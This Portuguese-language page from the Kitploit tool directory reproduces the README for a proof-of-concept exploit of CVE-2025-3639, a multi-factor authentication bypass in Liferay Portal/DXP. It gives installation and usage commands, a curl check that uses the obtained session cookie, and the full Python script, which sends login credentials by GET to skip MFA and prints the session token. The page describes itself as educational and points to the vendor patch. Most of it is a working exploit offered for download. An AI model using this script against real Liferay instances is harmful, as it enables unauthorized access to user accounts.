Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-3639 — vulnerabilidade de bypass de login no Liferay Portal (versões 7.3.0–7.4.3.132) e Liferay DXP (várias versões de 2024.Q1 a 2025.Q1.6) | Kitploit
Ferramentas/GitHubGitHub/6lj/cve-2025-3639
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHub6lj/cve-2025-3639

CVE-2025-3639

vulnerabilidade de bypass de login no Liferay Portal (versões 7.3.0–7.4.3.132) e Liferay DXP (várias versões de 2024.Q1 a 2025.Q1.6)

Ver Repositório
211há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-3639 PoC - Bypass de Login no Liferay Portal/DXP

Este repositório contém uma Prova de Conceito (PoC) para CVE-2025-3639, uma vulnerabilidade de bypass de login no Liferay Portal (versões 7.3.0–7.4.3.132) e Liferay DXP (várias versões de 2024.Q1 a 2025.Q1.6). A PoC demonstra como um usuário não autenticado com credenciais válidas pode contornar a autenticação multifator (MFA) modificando uma requisição POST para uma requisição GET, potencialmente obtendo acesso não autorizado às contas de usuário.

Aviso: Esta PoC é apenas para fins educacionais. Testes ou exploração não autorizados desta vulnerabilidade são ilegais e antiéticos. Use apenas com permissão explícita por escrito do proprietário do sistema.

Requisitos

  • Ambiente: Linux (por exemplo, Kali Linux, Ubuntu ou uma configuração virtualizada).
  • Dependências:
    sudo apt-get update
    sudo apt-get install python3 python3-requests
    pip3 install requests
    
  • Rede: Acesso a uma instância alvo do Liferay Portal/DXP (deve estar em um ambiente de teste com permissão explícita).
  • Credenciais: Credenciais de usuário válidas para a instância Liferay alvo.

Instalação

  1. Clone o repositório:

    git clone https://github.com/6lj/CVE-2025-3639.git
    cd CVE-2025-3639
    
  2. Certifique-se de que o Python 3 e a biblioteca requests estejam instalados:

    pip3 install requests
    

O que ele faz

  • A PoC explora a CVE-2025-3639 modificando uma requisição POST de login para uma requisição GET, contornando as verificações de MFA.
  • Ela envia uma requisição HTTP GET personalizada com credenciais válidas para autenticar sem concluir o processo de MFA.
  • O script foi projetado para demonstrar a vulnerabilidade em um ambiente controlado e autorizado.

Uso

Execute o script PoC com os argumentos apropriados (substitua <target_url>, <username> e <password> pela URL da instância Liferay alvo e credenciais válidas).

poc.py

python3 poc.py --target <target_url> --username <username> --password <password>
  • Parâmetros:
    • --target: A URL da instância Liferay Portal/DXP (ex.: http://example.com).
    • --username: Nome de usuário válido para a instância alvo.
    • --password: Senha válida para o nome de usuário.

Exemplo

python3 poc.py --target http://192.168.1.100 --username [email protected] --password Test123!

Verificar Resultados

  • Sucesso: Se o exploit funcionar, o script retornará um token de sessão válido ou uma mensagem de sucesso indicando acesso à conta do usuário sem MFA.

    curl -b "COOKIE=<session_token>" http://<target_url>/api/jsonws/user/get-current-user
    
    • Saída esperada: Detalhes do usuário confirmando autenticação bem-sucedida.
  • Falha: Se o servidor retornar um erro (ex.: 401 Unauthorized ou 403 Forbidden), a instância pode não ser vulnerável, ou a MFA não está habilitada.

  • Monitore o Tráfego: Use uma ferramenta como Wireshark para inspecionar o tráfego HTTP:

    sudo wireshark -f "tcp port 80 or tcp port 443"
    

Script PoC

Abaixo está o código de exemplo para poc.py:

import requests
import argparse

def exploit(target, username, password):
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
    login_url = f"{target}/c/portal/login"

    params = {
        "p_auth": "",
        "login": username,
        "password": password
    }
    
    try:
        response = requests.get(login_url, params=params, allow_redirects=True)
        if response.status_code == 200 and "JSESSIONID" in response.cookies:
            print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
            return True
        else:
            print(f"[-] Failed: {response.status_code} - {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
    parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
    parser.add_argument("--username", required=True, help="Valid username")
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    
    exploit(args.target, args.username, args.password)

Notas Importantes

  • Esta PoC exige credenciais válidas, pois a vulnerabilidade permite contornar a MFA, mas não adivinhar credenciais.
  • Teste apenas em um ambiente controlado com permissão explícita do proprietário do sistema.
  • A vulnerabilidade foi corrigida em versões mais recentes do Liferay Portal/DXP. Atualize para a versão mais recente para mitigar este problema.
  • Comunicado de Segurança da Liferay
  • NVD CVE-2025-3639
  • Repositório GitHub

Aviso Legal

Este projeto é apenas para fins educacionais. O autor não se responsabiliza por qualquer uso não autorizado ou ilegal desta PoC. Sempre obtenha permissão explícita do proprietário do sistema antes de testar.

Baixar ferramenta